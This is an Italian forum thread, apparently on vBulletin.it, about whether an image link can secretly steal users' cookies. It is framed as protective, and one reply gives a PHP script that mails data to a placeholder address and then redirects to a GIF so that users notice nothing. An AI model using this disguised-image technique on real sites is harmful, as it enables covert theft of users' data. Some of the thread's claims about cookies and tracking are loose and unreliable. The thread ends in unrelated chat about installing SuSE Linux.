Ce lo studiamo un pò ?
Ovviamente a scopo didattico e di tutela :D
Il codice che manda i cookies può essere nascosto in un immagine che viene caricata e si mostra correttamente ?
Visualizzazione Stampabile
Ce lo studiamo un pò ?
Ovviamente a scopo didattico e di tutela :D
Il codice che manda i cookies può essere nascosto in un immagine che viene caricata e si mostra correttamente ?
Sapevo che questo sarebbe venuto per prossimo :D
Generalmente no. Un file GIF, o una qualsiasi immagine, deve contenere i codici per mostrare l'immagine. Però ... per fare una cosa del genere, si può ricorrere a un trucchetto all'interno dello script, con un semplice redirect all'immagine, dopo aver fatto tutto ciò che si voleva fare, ad esempio:
In questo modo, l'immagine viene mostrato e il browser non si accorge di nulla, tanto meno l'utente.Codice PHP:<?php
// scrivi qui tutto che vuoi
mail(
"nessuno@example.com",
"oggetto",
$messaggio,
"From: webmaster@{$_SERVER['SERVER_NAME']}\r\n" .
"Reply-To: webmaster@{$_SERVER['SERVER_NAME']}\r\n" .
"X-Mailer: PHP/" . phpversion()
);
// termina script con la visualizzazione dell'immagine
header("Location: http://www.{$_SERVER['SERVER_NAME']}/image.gif");
die();
?>
Il limite dell'Exploit quindi sta solo nel caricare l'immagine sul server al quale deve "rubare" i cookies e quindi diventa pericoloso fare allegare le immagini.
Ora, per tranquillizzare, ci sono due o tre cose da dire:
Per allarmare:
- I cookie di vbulletin non espongono la password in chiaro, ma elaborato con il Message Digest 5, esattamente come si tova all'interno del database, e non svela il nome dell'utente. Più esattamente non svela nulla.
- Chi volesse ricostruire la password, dovrebbe sapere come viene composta, e poi tentare tutte le possibili combinazioni. Per una password lunga di 7 caratteri, e con i processori a disposizione oggi, questo calcolo durerebbe almeno una settimana, se non più, escludendo una qualsiasi operazione in parallelo (PC dedicato). Dopo aver ottenuta la password, è necessario accedere al database degli utenti (elenco membri) e provare l'accesso. Dopo 5 accessi errati, il giochino è bloccato per almeno 15 minuti. Per forum con 2000 utenti, il gioco dura 100 ore, ossia 4 giorni e 4 ore.
- Un pirata che entra, comunque non può fare molto danno, perché, ad esempio, la email non può essere cambiata senza che il titolare legittimo lo viene a sapere (solo se la conferma email è abilitata). Al massimo può fare un po' di disordine.
- Se vi arriva un'email che vi avvisa che state cambiando il vostro indirizzo, senza averlo fatto, o trovare le vostre cose in disordine, avvisate subito l'amministratore del forum per bloccare l'accesso.
- Non viene inviato alcun dato di altri siti visitati nella stessa sessione del browser. Se cliccate ad esempio su un'immagine preparata qui (ipoteticamente), verranno inviati soltanto i cookie di vbulletin.it
- Lo script potrebbe mostrare una maschera per sollecitare il cambio della password: NON FARLO!!!
- Vale anche per altri dati, come ad esempio il numero della carta di credito.
Di per sé allegare immagini non è pericoloso, perché vBulletin è abbastanza tutelato (prova allegare un *.gif). Il problema nasce però se il testo o la firma contiene immagini prelevati da altri siti, o loro collegamenti.Citazione:
Originariamente Scritto da Sergio
Più esattamente, i file *.gif e collegamenti a pagine statiche e dinamiche sono affetti da questo problema, quindi potrebbe diventare impossibile navigare senza essere continuamente spiati.
E infatti questo sta succedendo già da molto tempo in modo più o meno trasparente. Prendiamo ad esempio adwords di Google. Il meccanismo di Google offre una grossa privacy, ma alcune caratteristiche sono basate sulla manipolazione dei cookie tramite uno script java, che viene inviato a Google, mentre si va ad accedere una pagina, che prontamente ci suggerisce cosa comprare per prossimo :dt:
L'unico nostro grande vantaggio è, che questi servizi nascosti richiedono una potenza di calcolo al di fuori della portata economica di una qualunque azienda piccola-media-grande. Soltanto i Multinazionali e Governi si possono permettere tale lusso, e questi fanno uso abbondante di questa tecnologia, ve lo garantisco :o
Ottimo, tra parentesi ci buttiamo li che Linux e Mac non lo sentono minimamente il problema dell'exploit in questione http://www.vbulletin.it/images/smilies/dito.gif
Che ti dicevo....:D Purtroppo io uso WinZOZ anche se sta sera..... ho installato la Suse ed è stupenda!
Guarda un pò questi siti se ti vuoi divertire :Citazione:
Originariamente Scritto da Danny
www.kde-look.org
http://netdragon.sourceforge.net/ssuperkaramba.html
:cool:
fantastici! Senti Sergio, dopo aver installato la Suse il desktop nn va a + di 640x480 e i caratteri sono piccolissimi... Pensi sia un problema dei driver della sk?